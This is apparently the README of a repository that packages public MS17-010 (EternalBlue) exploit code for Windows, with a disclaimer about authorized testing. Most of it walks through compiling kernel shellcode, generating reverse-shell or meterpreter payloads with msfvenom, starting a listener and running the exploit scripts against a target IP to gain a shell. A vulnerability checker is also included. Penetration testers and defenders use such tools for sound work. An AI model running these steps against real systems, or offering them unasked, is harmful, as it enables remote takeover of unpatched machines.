/AutoBlue-MS17-010

This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010

Primary LanguagePythonMIT LicenseMIT

MS17-010 Exploit Code

This is public exploit code can be used to test if your windows-machines are vulnerable. If they are, you should patch them immediateley, as malware out there is active exploiting this vulnerability

Dislcaimer:

Test only systems you own or/and have explicit permission to (like in pentests or IT-security-lab-environment). If you use this, you are fully rensponsible for everything that results. Including but not limited to:

  • malfunctioning services
  • financial damages
  • getting fired ...

About:

This generates valid shellcode for the eternal blue exploit and scripts out the event listener with the metasploit multi-handler or netcat as listener.

This version of the exploit is prepared in a way where you can exploit eternal blue WITHOUT metasploit (which could be needed in any situation you don't have access to metasploit or its use is restricted). Your options for auto shell generation are to generate shellcode with msfvenom that has meterpreter (i.e. with metasploit) or to generate a normal windows cmd shell (i.e. without metasploit). You may also select between staged and stageless payloads if you wish to avoid utilizing the msfconsole entirely and use netcat/your own shell handler. Alternatively you can elect to brew in your own shellcode.

This allows for this version of the MS17-010 exploit to be a bit more flexible, and also fully functional, as many exploits leave out the steps to compile the kernel shellcode that usually comes with it.

Included is also an enternal blue checker script that allows you to test if your target is potentially vulnerable to MS17-010

run python eternalblue_checker.py <TARGET-IP>

USAGE:

Navigate to the shellcode directory in the repo:

run ./shell_prep.sh

Follow the prompts, for example:

Compiling x64 kernel shellcode Compiling x86 kernel shellcode kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n) y LHOST for reverse connection: LPORT you want x64 to listen on: LPORT you want x86 to listen on: Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell 0


After the script finishes there will be a shellcode binary named `sc_all.bin` in the shellcode directory


Next, navigate to the main repo directory:

run `listener_prep.sh`

Follow the prompts, for example:

/,- ||) \_, ) `--' Enternal Blue Metasploit Listener

LHOST for reverse connection: LPORT for x64 reverse connection: LPORT for x86 reverse connection: Enter 0 for meterpreter shell or 1 for regular cmd shell: 0 Starting listener...


## Test:
If you have completed the USAGE steps, now you're ready to Test the target.

run:

`python eternalblue_exploit7.py <TARGET-IP> <PATH/TO/SHELLCODE/sc_all.bin> <Number of Groom Connections (optional)>`

Alternatively you may use `zzz_exploit.py` which is an implementation of the "Eternal" family that uses the same technique from Eternal Romance, Synergy, and Champion. 

This is not setup to send back a reverse shell or execute any sort of payload like Eternal Blue is. This uses the functions from mysmb.py to spawn a semi-interactive cmd shell. There are commented out sections of code that can be modified to interact with metasploit or send of custom payloads using the `service_exec()` function call.

All of the code execution functionality can be found in the `do_system_mysmb_session()` function.

This version of the exploit is great for targeting systems that have named pipes available to avoid crashing the target.

run:

`python zzz_exploit.py <TARGET-IP>`


Enternal Blue has only been tested on Windows 7/Server 2008, and Windows 10 10240 (x64) 

zzz has only been tested on Windows XP

However the Eternal Blue exploits included in this repo also include support for Windows 8/Server 2012 and *should* work.

The zzz exploit should also work on all targets provided you have access to a named pipe. For some OS's (Windows 10) this may also require credentials of a user who can access this named pipe (This is because on newer versions, Guest and NULL sessions are not supported out of the box).

The original exploit code that this repo pulls from is located here: https://github.com/worawit/MS17-010